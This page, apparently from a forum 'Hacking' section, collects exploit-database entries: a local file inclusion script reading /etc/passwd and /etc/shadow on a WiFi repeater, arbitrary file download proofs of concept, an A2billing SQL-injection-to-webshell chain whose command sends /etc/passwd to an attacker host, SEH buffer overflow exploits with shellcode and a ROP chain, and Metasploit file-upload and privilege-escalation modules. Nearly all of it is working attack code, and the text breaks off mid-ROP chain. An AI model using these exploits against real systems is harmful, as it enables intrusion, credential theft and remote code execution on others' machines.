    # Exploit Title: WIFI Repeater BE126 – Local File Inclusion # Date Publish: 23/08/2017 # Exploit Authors: Hay Mizrachi, Omer Kaspi # Contact: [email protected], [email protected] # Vendor Homepage: http://www.twsz.com # Category: Webapps # Version: 1.0 # Tested on: Windows/Ubuntu 16.04 # CVE: CVE-2017-8770 1 - Description: 'getpage' HTTP parameter is not escaped in include file, Which allow us to include local files with a root privilege user, aka /etc/password, /etc/shadow and so on. 2 - Proof of Concept: http://Target/cgi-bin/webproc?getpage=[LFI] /etc/passwd: http://Target/cgi-bin/webproc?getpage=../../../../etc/passwd&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:login=true&var:page=wizard #root:x:0:0:root:/root:/bin/bash root:x:0:0:root:/root:/bin/sh #tw:x:504:504::/home/tw:/bin/bash #tw:x:504:504::/home/tw:/bin/msh /etc/shadow; http://Target/cgi-bin/webproc?getpage=../../../../etc/shadow&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:login=true&var:page=wizard import urllib2, httplib, sys ''' LFI PoC By Hay and Omer ''' print "[+] cgi-bin/webproc exploiter [+]" print "[+] usage: python " + __file__ + " http://<target_ip>" ip_add = sys.argv[1] fd = raw_input('[+] File or Directory: aka /etc/passwd and etc..\n') print "Exploiting....." print '\n' URL = "http://" + ip_add + "/cgi-bin/webproc?getpage=/" + fd + "&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:login=true&var:page=wizard" print urllib2.urlopen(URL).read()
  10. Hacking

    # # # # # # Exploit Title: WYSIWYG HTML Editor PRO 1.0 - Arbitrary File Download # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Link: https://codecanyon.net/item/wysiwyg-html-editor-pro-php-based-editor-with-image-uploader-and-more/19012022 # Demo: http://codecanyon.nelliwinne.net/WYSIWYGEditorPRO/ # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The security obligation allows an attacker to arbitrary download files.. # # Vulnerable Source: # # ............. # <?php # $file = base64_decode($_GET['id']); # # if (file_exists($file)) { # header('Content-Description: File Transfer'); # header('Content-Type: application/octet-stream'); # header('Content-Disposition: attachment; filename="'.basename($file).'"'); # header('Expires: 0'); # header('Cache-Control: must-revalidate'); # header('Pragma: public'); # header('Content-Length: ' . filesize($file)); # readfile($file); # exit; # } # ?> # ............. # Proof of Concept: # # http://localhost/[PATH]/wysiwyg/download.php?id=[FILENAME_to_BASE64] # # Etc... # # # # #
  11. Hacking

    # # # # # # Exploit Title: WYSIWYG HTML Editor PRO 1.0 - Arbitrary File Download # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Link: https://codecanyon.net/item/wysiwyg-html-editor-pro-php-based-editor-with-image-uploader-and-more/19012022 # Demo: http://codecanyon.nelliwinne.net/WYSIWYGEditorPRO/ # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The security obligation allows an attacker to arbitrary download files.. # # Vulnerable Source: # # ............. # <?php # $file = base64_decode($_GET['id']); # # if (file_exists($file)) { # header('Content-Description: File Transfer'); # header('Content-Type: application/octet-stream'); # header('Content-Disposition: attachment; filename="'.basename($file).'"'); # header('Expires: 0'); # header('Cache-Control: must-revalidate'); # header('Pragma: public'); # header('Content-Length: ' . filesize($file)); # readfile($file); # exit; # } # ?> # ............. # Proof of Concept: # # http://localhost/[PATH]/wysiwyg/download.php?id=[FILENAME_to_BASE64] # # Etc... # # # # #
  12. # # # # # # Exploit Title: Joomla! Component Joomanager 2.0.0 - Arbitrary File Download # Dork: N/A # Date: 30.08.2017 # Vendor Homepage: http://www.joomanager.com/ # Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/joomanager/ # Demo: http://www.joomanager.com/demo/realestate # Version: 2.0.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The security obligation allows an attacker to arbitrary download files.. # # Proof of Concept: # # http://localhost/[PATH]/index.php?option=com_joomanager&controller=details&task=download&path=[FILE] # # Etc.. # # # # #
  13. # Title : A2billing 2.x , Unauthenticated Backup dump / RCE flaw # Vulnerable software : A2billing 2.x # Author : Ahmed Sultan (0x4148) # Email : [email protected] # Home : 0x4148.com # Linkedin : https://www.linkedin.com/in/0x4148/ A2billing contain multiple flaws which can be chained together to achieve shell access over the a2b instance If you're looking for deep technical stuff , check out the full writeup at https://0x4148.com/2016/10/28/a2billing-rce/ 1 . backup dump Vulnerable code File : admin/public/form_data/FG_var_backup.inc getpost_ifset(array('name','path','creationdate')); $HD_Form = new FormHandler("cc_backup","Backup"); $HD_Form -> FG_DEBUG = 0; if ($form_action!='ask-add') check_demo_mode(); if ($form_action == 'add'){ $backup_file = $path; if (substr($backup_file,-3)=='.gz'){ // WE NEED TO GZIP $backup_file = substr($backup_file,0,-3); $do_gzip=1; } // Make the backup stuff here and redirect to success page //mysqldump -all --databases mya2billing -ua2billinguser -pa2billing > /tmp/test.sql //pg_dump -c -d -U a2billinguser -h localhost -f /tmp/test.sql mya2billing if (DB_TYPE != 'postgres'){ $run_backup=MYSQLDUMP." -all --databases ".DBNAME." -u'".USER."' -p'".PASS."' > '{$backup_file}'"; }else{ $env_var="PGPASSWORD='".PASS."'"; putenv($env_var); $run_backup=PG_DUMP." -c -d -U ".USER." -h ".HOST." -f '{$backup_file}' ".DBNAME; } if ($FG_DEBUG == 1 ) echo $run_backup."<br>"; >>>> exec($run_backup,$output,$error); if ($do_gzip){ // Compress file $run_gzip = GZIP_EXE." '$backup_file'"; if ($FG_DEBUG == 1 ) echo $run_gzip."<br>"; >>>> exec($run_gzip,$output,$error_zip); } File is being called at "admin/Public/A2B_entity_backup.php" before the authentication checking proccess take place so to dump full backup we can just move to : http://HOST//a2billing/admin/Public/A2B_entity_backup.php?form_action=add&path=0x4148.sql backup will be found at admin/Public/0x4148.sql few hardening is being carried out by the application which did great job preventing direct RCE flaw , so we had to figure out sth else 2 . SQL injection File name : ckeckout_process.php Line 287 : $Query = "INSERT INTO cc_payments_agent ( agent_id, agent_name, agent_email_address, item_name, item_id, item_quantity, payment_method, cc_type, cc_owner, cc_number, " . " cc_expires, orders_status, last_modified, date_purchased, orders_date_finished, orders_amount, currency, currency_value) values (" . " '".$transaction_data[0][1]."', '".$customer_info[3]." ".$customer_info[2]."', '".$customer_info["email"]."', 'balance', '". $customer_info[0]."', 1, '$pmodule', '".$_SESSION["p_cardtype"]."', '".$transaction_data[0][5]."', '".$transaction_data[0][6]."', '". $transaction_data[0][7]."', $orderStatus, '".$nowDate."', '".$nowDate."', '".$nowDate."', ".$amount_paid.", '".$currCurrency."', '". $currencyObject->get_value($currCurrency)."' )"; $result = $DBHandle_max -> Execute($Query); By exploiting this flaw we can insert malicious data into the db using the following query <thanks to i-Hmx for the great hint> transactionID=456789111111 unise//**lecton selinse//**rtect 1,2,3,4,0x706c75676e706179,0x3c3f706870206576616c286261736536345f6465636f646528245f504f53545b6e61696c69745d29293b203f3e,7,8,9,10,11,12,13-//**- -&sess_id=4148&key=98346a2b29c131c78dc89b50894176eb After sending this request the following payload "<?php eval(base64_decode($_POST[nailit])); ?>" will be injected directly into the DB 3 . RCE after injecting the malicious code we can just dump backup again but this time we will name it "0x4148.php" , so our code can be executed :) [[email protected] Public]# curl ' https://127.0.0.1/a2billing/admin/Public/A2B_entity_backup.php?form_action=add&path=0x4148.php' --insecure [[email protected] Public]# cat 0x4148.php | grep nailit INSERT INTO `cc_payments_agent` VALUES (295,2,' ','','balance','',1,'plugnpay','','66666666666666666666666666666666666666666666','77777777777777777777777777777777','8',-1,'3.000000','2016-10-28 10:57:10','2016-10-28 10:57:10','2016-10-28 10:57:10','usd','0.000000'),(296,2,' ','','balance','',1,'plugnpay','','<?php eval(base64_decode($_POST[nailit])); ?>','7','8',-1,'3.000000','2016-10-28 10:58:22','2016-10-28 10:58:22','2016-10-28 10:58:22','usd','0.000000'); Now just exploit it via post nailit=base64_encoded php code to admin/Public/0x4148.php for instance system(‘x=$(cat /etc/passwd);curl -d “$x” http://x.x.x.x:8000/0x4148.jnk’); will read /etc/passwd and send it to our nc listener Exploit timeline : 01/10/2016 : vulnerability reported to vendor 06/10/2016 - 12/2016 : talks talks talks with promises of fixing ASAP 04/09/2017 : Public release Credits, Ahmed Sultan - Cyber Security Analyst @ EG-CERT
  14. #!/usr/bin/env python # Easy File Sharing Web Server v7.2 Remote SEH Based Overflow # The buffer overwrites ebx with 750+ offset, when sending 4059 it overwrites the EBX # vulnerable file /changeuser.ghp > Cookies UserID=[buf] # Means there are two ways to exploit changeuser.ghp # Tested on Win7 x64 and x86, it should work on win8/win10 # By Audit0r # https://twitter.com/Audit0rSA import sys, socket, struct if len(sys.argv) <= 1: print "Usage: python efsws.py [host] [port]" exit() host = sys.argv[1] port = int(sys.argv[2]) # https://code.google.com/p/win-exec-calc-shellcode/ shellcode = ( "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" + "\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" + "\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" + "\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" + "\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" + "\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" + "\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" + "\x1c\x39\xbd" ) print "[+]Connecting to" + host craftedreq = "A"*4059 craftedreq += "\xeb\x06\x90\x90" # basic SEH jump craftedreq += struct.pack("<I", 0x10017743) # pop commands from ImageLoad.dll craftedreq += "\x90"*40 # NOPer craftedreq += shellcode craftedreq += "C"*50 # filler httpreq = ( "GET /changeuser.ghp HTTP/1.1\r\n" "User-Agent: Mozilla/4.0\r\n" "Host:" + host + ":" + str(port) + "\r\n" "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" "Accept-Language: en-us\r\n" "Accept-Encoding: gzip, deflate\r\n" "Referer: http://" + host + "/\r\n" "Cookie: SESSIONID=6771; UserID=" + craftedreq + "; PassWD=;\r\n" "Conection: Keep-Alive\r\n\r\n" ) print "[+]Sending the Calc...." s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.send(httpreq) s.close()
  15. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'nokogiri' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => 'Th3 MMA mma.php Backdoor Arbitrary File Upload', 'Description' => %q{ This module exploits Th3 MMA mma.php Backdoor which allows an arbitrary file upload that leads to arbitrary code execution. This backdoor also echoes the Linux kernel version or operating system version because of the php_uname() function. }, 'License' => MSF_LICENSE, 'Author' => [ 'Jay Turla <@shipcod3>', ], 'References' => [ ['URL', 'http://blog.pages.kr/1307'] # Analysis of mma.php file upload backdoor ], 'Privileged' => false, 'Payload' => { 'Space' => 10000, 'DisableNops' => true }, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [ ['mma file uploader', {} ] ], 'DisclosureDate' => 'Apr 2 2012', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI',[true, "The path of the mma.php file uploader backdoor", "/mma.php"]), ],self.class) # sometimes it is under host/images/mma.php so you may want to set this one end def has_input_name?(nodes, name) nodes.select { |e| e.attributes['name'].value == name }.empty? ? false : true end def check uri = normalize_uri(target_uri.path) res = send_request_cgi({ 'method' => 'GET', 'uri' => uri }) if res n = ::Nokogiri::HTML(res.body) form = n.at('form[@id="uploader"]') inputs = form.search('input') if has_input_name?(inputs, 'file') && has_input_name?(inputs, '_upl') return Exploit::CheckCode::Appears end end Exploit::CheckCode::Safe end def exploit uri = normalize_uri(target_uri.path) payload_name = "#{rand_text_alpha(5)}.php" print_status("#{peer} - Trying to upload #{payload_name} to mma.php Backdoor") data = Rex::MIME::Message.new data.add_part('Upload', nil, nil, 'form-data; name="_upl"') data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{payload_name}\"") post_data = data.to_s res = send_request_cgi({ 'method' => 'POST', 'uri' => uri, 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data }) if res if res.body =~ /uplod d0n3 in SAME file/ print_good("#{peer} - Our payload #{payload_name} has been uploaded. Calling payload...") register_files_for_cleanup(payload_name) else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") end else fail_with(Failure::Unknown, 'Connection Timed Out') end send_request_cgi({ 'uri' => normalize_uri(payload_name), 'method' => 'GET' }) end end
  16. require 'msf/core' require 'nokogiri' class Metasploit4 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::PhpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'Idera Up.Time Monitoring Station 7.4 post2file.php Arbitrary File Upload', 'Description' => %q{ This module exploits a vulnerability found in Uptime version 7.4.0 and 7.5.0. The vulnerability began as a classic arbitrary file upload vulnerability in post2file.php, which can be exploited by exploits/multi/http/uptime_file_upload_1.rb, but it was mitigated by the vendor. Although the mitigiation in place will prevent uptime_file_upload_1.rb from working, it can still be bypassed and gain privilege escalation, and allows the attacker to upload file again, and execute arbitrary commands. }, 'License' => MSF_LICENSE, 'Author' => [ 'Denis Andzakovic', # Found file upload bug in post2file.php in 2013 'Ewerson Guimaraes(Crash) <crash[at]dclabs.com.br>', 'Gjoko Krstic(LiquidWorm) <gjoko[at]zeroscience.mk>' ], 'References' => [ ['EDB', '37888'], ['URL', 'http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5254.php'] ], 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Targets' => [['Automatic', {}]], 'Privileged' => 'true', 'DefaultTarget' => 0, # The post2file.php vuln was reported in 2013 by Denis Andzakovic. And then on Aug 2015, # it was discovered again by Ewerson 'Crash' Guimaraes. 'DisclosureDate' => 'Nov 18 2013' )) register_options( [ Opt::RPORT(9999), OptString.new('USERNAME', [true, 'The username to authenticate as', 'sample']), OptString.new('PASSWORD', [true, 'The password to authenticate with', 'sample']) ], self.class) register_advanced_options( [ OptString.new('UptimeWindowsDirectory', [true, 'Uptime installation path for Windows', 'C:\\Program Files\\uptime software\\']), OptString.new('UptimeLinuxDirectory', [true, 'Uptime installation path for Linux', '/usr/local/uptime/']), OptString.new('CmdPath', [true, 'Path to cmd.exe', 'c:\\windows\\system32\\cmd.exe']) ], self.class) end def print_status(msg='') super("#{rhost}:#{rport} - #{msg}") end def print_error(msg='') super("#{rhost}:#{rport} - #{msg}") end def print_good(msg='') super("#{rhost}:#{rport} - #{msg}") end # Application Check def check res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path) ) unless res vprint_error("Connection timed out.") return Exploit::CheckCode::Unknown end n = Nokogiri::HTML(res.body) uptime_text = n.at('//ul[@id="uptimeInfo"]//li[contains(text(), "up.time")]') if uptime_text version = uptime_text.text.scan(/up\.time ([\d\.]+)/i).flatten.first vprint_status("Found version: #{version}") if version >= '7.4.0' && version <= '7.5.0' return Exploit::CheckCode::Appears end end Exploit::CheckCode::Safe end def create_exec_service(*args) cookie_split, rhost, uploadpath, phppath, phpfile_name, cmd, cmdargs = *args res_service = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'main.php'), 'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", 'vars_get' => { 'section' => 'ERDCInstance', 'subsection' => 'add', }, 'vars_post' => { 'initialERDCId' => '20', 'target' => '1', 'targetType' => 'systemList', 'systemList' => '1', 'serviceGroupList' => '-10', 'initialMode' => 'standard', 'erdcName' => 'Exploit', 'erdcInitialName' => '', 'erdcDescription' => 'Exploit', 'hostButton' => 'system', 'erdc_id' => '20', 'forceReload' => '0', 'operation' => 'standard', 'erdc_instance_id' => '', 'label_[184]' => 'Script Name', 'value_[184]' => cmd, 'id_[184]' => 'process', 'name_[process]' => '184', 'units_[184]' => '', 'guiBasic_[184]' => '1', 'inputType_[184]' => 'GUIString', 'screenOrder_[184]' => '1', 'parmType_[184]' => '1', 'label_[185]' => 'Arguments', 'value_[185]' => cmdargs, 'id_[185]' => 'args', 'name_[args]' => '185', 'units_[185]' => '', 'guiBasic_[185]' => '1', 'inputType_[185]' => 'GUIString', 'screenOrder_[185]' => '2', 'parmType_[185]' => '1', 'label_[187]' => 'Output', 'can_retain_[187]' => 'false', 'comparisonWarn_[187]' => '-1', 'comparison_[187]' => '-1', 'id_[187]' => 'value_critical_output', 'name_[output]' => '187', 'units_[187]' => '', 'guiBasic_[187]' => '1', 'inputType_[187]' => 'GUIString', 'screenOrder_[187]' => '4', 'parmType_[187]' => '2', 'label_[189]' => 'Response time', 'can_retain_[189]' => 'false', 'comparisonWarn_[189]' => '-1', 'comparison_[189]' => '-1', 'id_[189]' => 'value_critical_timer', 'name_[timer]' => '189', 'units_[189]' => 'ms', 'guiBasic_[189]' => '0', 'inputType_[189]' => 'GUIInteger', 'screenOrder_[189]' => '6', 'parmType_[189]' => '2', 'timing_[erdc_instance_monitored]' => '1', 'timing_[timeout]' => '60', 'timing_[check_interval]' => '10', 'timing_[recheck_interval]' => '1', 'timing_[max_rechecks]' => '3', 'alerting_[notification]' => '1', 'alerting_[alert_interval]' => '120', 'alerting_[alert_on_critical]' => '1', 'alerting_[alert_on_warning]' => '1', 'alerting_[alert_on_recovery]' => '1', 'alerting_[alert_on_unknown]' => '1', 'time_period_id' => '1', 'pageFinish' => 'Finish', 'pageContinue' => 'Continue...', 'isWizard' => '1', 'wizardPage' => '2', 'wizardNumPages' => '2', 'wizardTask' => 'pageFinish', 'visitedPage[1]' => '1', 'visitedPage[2]' => '1' }) end def exploit vprint_status('Trying to login...') # Application Login res_auth = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'index.php'), 'vars_post' => { 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] }) unless res_auth fail_with(Failure::Unknown, 'Connection timed out while trying to login') end # Check OS phpfile_name = rand_text_alpha(10) if res_auth.headers['Server'] =~ /Unix/ vprint_status('Found Linux installation - Setting appropriated PATH') phppath = Rex::FileUtils.normalize_unix_path(datastore['UptimeLinuxDirectory'], 'apache/bin/ph') uploadpath = Rex::FileUtils.normalize_unix_path(datastore['UptimeLinuxDirectory'], 'GUI/wizards') cmdargs = "#{uploadpath}#{phpfile_name}.txt" cmd = phppath else vprint_status('Found Windows installation - Setting appropriated PATH') phppath = Rex::FileUtils.normalize_win_path(datastore['UptimeWindowsDirectory'], 'apache\\php\\php.exe') uploadpath = Rex::FileUtils.normalize_win_path(datastore['UptimeWindowsDirectory'], 'uptime\\GUI\\wizards\\') cmd = datastore['CmdPath'] cmdargs = "/K \"\"#{phppath}\" \"#{uploadpath}#{phpfile_name}.txt\"\"" end if res_auth.get_cookies =~ /login=true/ cookie = Regexp.last_match(1) cookie_split = res_auth.get_cookies.split(';') vprint_status("Cookies Found: #{cookie_split[1]} #{cookie_split[2]}") print_good('Login success') # Privilege escalation getting user ID res_priv = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'main.php'), 'vars_get' => { 'page' => 'Users', 'subPage' => 'UserContainer' }, 'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}" ) unless res_priv fail_with(Failure::Unknown, 'Connection timed out while getting userID.') end matchdata = res_priv.body.match(/UPTIME\.CurrentUser\.userId\.*/) unless matchdata fail_with(Failure::Unknown, 'Unable to find userID for escalation') end get_id = matchdata[0].gsub(/[^\d]/, '') vprint_status('Escalating privileges...') # Privilege escalation post res_priv_elev = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'main.php'), 'vars_get' => { 'section' => 'UserContainer', 'subsection' => 'edit', 'id' => "#{get_id}" }, 'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", 'vars_post' => { 'operation' => 'submit', 'disableEditOfUsernameRoleGroup' => 'false', 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'], 'passwordConfirm' => datastore['PASSWORD'], 'firstname' => rand_text_alpha(10), 'lastname' => rand_text_alpha(10), 'location' => '', 'emailaddress' => '', 'emailtimeperiodid' => '1', 'phonenumber' => '', 'phonenumbertimeperiodid' => '1', 'windowshost' => '', 'windowsworkgroup' => '', 'windowspopuptimeperiodid' => '1', 'landingpage' => 'MyPortal', 'isonvacation' => '0', 'receivealerts' => '0', 'activexgraphs' => '0', 'newuser' => 'on', 'newuser' => '1', 'userroleid' => '1', 'usergroupid[]' => '1' } ) unless res_priv_elev fail_with(Failure::Unknown, 'Connection timed out while escalating...') end # Refresing perms vprint_status('Refreshing perms...') res_priv = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'index.php?loggedout'), 'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}" ) unless res_priv fail_with(Failure::Unknown, 'Connection timed out while refreshing perms') end res_auth = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'index.php'), 'vars_post' => { 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] } ) unless res_auth fail_with(Failure::Unknown, 'Connection timed out while authenticating...') end if res_auth.get_cookies =~ /login=true/ cookie = Regexp.last_match(1) cookie_split = res_auth.get_cookies.split(';') vprint_status("New Cookies Found: #{cookie_split[1]} #{cookie_split[2]}") print_good('Priv. Escalation success') end # CREATING Linux EXEC Service if res_auth.headers['Server'] =~ /Unix/ vprint_status('Creating Linux Monitor Code exec...') create_exec_service(cookie_split, rhost, uploadpath, phppath, phpfile_name, cmd, cmdargs) else # CREATING Windows EXEC Service# vprint_status('Creating Windows Monitor Code exec...') create_exec_service(cookie_split, rhost, uploadpath, phppath, phpfile_name, cmd, cmdargs) end # Upload file vprint_status('Uploading file...') up_res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'wizards', 'post2file.php'), 'vars_post' => { 'file_name' => "#{phpfile_name}.txt", 'script' => payload.encoded } ) unless up_res fail_with(Failure::Unknown, 'Connection timed out while uploading file.') end vprint_status('Checking Uploaded file...') res_up_check = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'wizards', "#{phpfile_name}.txt") ) if res_up_check && res_up_check.code == 200 print_good("File found: #{phpfile_name}") else print_error('File not found') return end # Get Monitor ID vprint_status('Fetching Monitor ID...') res_mon_id = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'ajax', 'jsonQuery.php'), 'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", 'vars_get' => { 'query' => 'GET_SERVICE_PAGE_ERDC_LIST', 'iDisplayStart' => '0', 'iDisplayLength' => '10', 'sSearch' => 'Exploit' } ) unless res_mon_id fail_with(Failure::Unknown, 'Connection timed out while fetching monitor ID') end matchdata = res_mon_id.body.match(/id=?[^>]*>/) unless matchdata fail_with(Failure::Unknown, 'No monitor ID found in HTML body. Unable to continue.') end mon_get_id = matchdata[0].gsub(/[^\d]/, '') print_good("Monitor id aquired:#{mon_get_id}") # Executing monitor send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'main.php'), 'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", 'vars_post' => { 'section' => 'RunERDCInstance', 'subsection' => 'view', 'id' => mon_get_id, 'name' => 'Exploit' } ) else print_error('Cookie not found') end end end
  17. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::PhpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'Idera Up.Time Monitoring Station 7.0 post2file.php Arbitrary File Upload', 'Description' => %q{ This module exploits an arbitrary file upload vulnerability found within the Up.Time monitoring server 7.2 and below. A malicious entity can upload a PHP file into the webroot without authentication, leading to arbitrary code execution. Although the vendor fixed Up.Time to prevent this vulnerability, it was not properly mitigated. To exploit against a newer version of Up.Time (such as 7.4), please use exploits/multi/http/uptime_file_upload_2. }, 'Author' => [ 'Denis Andzakovic <denis.andzakovic[at]security-assessment.com>' # Vulnerability discoverey and MSF module ], 'License' => MSF_LICENSE, 'References' => [ [ 'OSVDB', '100423' ], [ 'BID', '64031'], [ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Up.Time%207.2%20-%20Arbitrary%20File%20Upload.pdf' ] ], 'Payload' => { 'Space' => 10000, # just a big enough number to fit any PHP payload 'DisableNops' => true }, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Up.Time 7.0/7.2', { } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 19 2013')) register_options([ OptString.new('TARGETURI', [true, 'The full URI path to the Up.Time instance', '/']), Opt::RPORT(9999) ], self.class) end def check uri = target_uri.path res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'wizards', 'post2file.php') }) if res and res.code == 500 and res.body.to_s =~ /<title><\/title>/ return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end def exploit print_status("#{peer} - Uploading PHP to Up.Time server") uri = target_uri.path @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self => true) post_data = ({ "file_name" => @payload_name, "script" => php_payload }) print_status("#{peer} - Uploading payload #{@payload_name}") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'wizards', 'post2file.php'), 'vars_post' => post_data, }) unless res and res.code == 200 and res.body.to_s =~ /<title><\/title>/ fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed") end print_status("#{peer} - Executing payload #{@payload_name}") res = send_request_cgi({ 'uri' => normalize_uri(uri, 'wizards', @payload_name), 'method' => 'GET' }) end end
  18. #!/usr/bin/env python # # Exploit title: Easy File Sharing Web Server v7.2 - Remote SEH Buffer Overflow (DEP bypass with ROP) # Date: 29/11/2015 # Exploit Author: Knaps # Contact: @TheKnapsy # Website: http://blog.knapsy.com # Software Link: http://www.sharing-file.com/efssetup.exe # Version: Easy File Sharing Web Server v7.2 # Tested on: Windows 7 x64, but should work on any other Windows platform # # Notes: # - based on non-DEP SEH buffer overflow exploit by Audit0r (https://www.exploit-db.com/exploits/38526/) # - created for fun & practice, also because it's not 1998 anymore - gotta bypass that DEP! :) # - bad chars: '\x00' and '\x3b' # - max shellcode size allowed: 1260 bytes # import sys, socket, struct # ROP chain generated with mona.py - www.corelan.be (and slightly fixed by @TheKnapsy) # Essentially, use PUSHAD to set all parameters and call VirtualProtect() to disable DEP. def create_rop_chain(): rop_gadgets = [ # Generate value of 201 in EAX 0x10015442, # POP EAX # RETN [ImageLoad.dll] 0xFFFFFDFF, # Value of '-201' 0x100231d1, # NEG EAX # RETN [ImageLoad.dll] # Put EAX into EBX (other unneccessary stuff comes with this gadget as well...) 0x1001da09, # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll] # Carry on with the ROP as generated by mona.py 0x10015442, # POP EAX # RETN [ImageLoad.dll] 0x61c832d0, # ptr to &VirtualProtect() [IAT sqlite3.dll] # Compensate for the ADD EBX,EAX gadget above, jump over 1 address, which is a dummy writeable location # used solely by the remaining part of the above gadget (it doesn't really do anything for us) 0x1001281a, # ADD ESP,4 # RETN [ImageLoad.dll] 0x61c73281, # &Writable location [sqlite3.dll] # And carry on further as generated by mona.py 0x1002248c, # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll] 0x61c18d81, # XCHG EAX,EDI # RETN [sqlite3.dll] 0x1001d626, # XOR ESI,ESI # RETN [ImageLoad.dll] 0x10021a3e, # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll] 0x10013ad6, # POP EBP # RETN [ImageLoad.dll] 0x61c227fa, # & push esp # ret [sqlite3.dll] 0x10022c4c, # XOR EDX,EDX # RETN [ImageLoad.dll] # Now bunch of ugly increments... unfortunately couldn't find anything nicer :( 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC 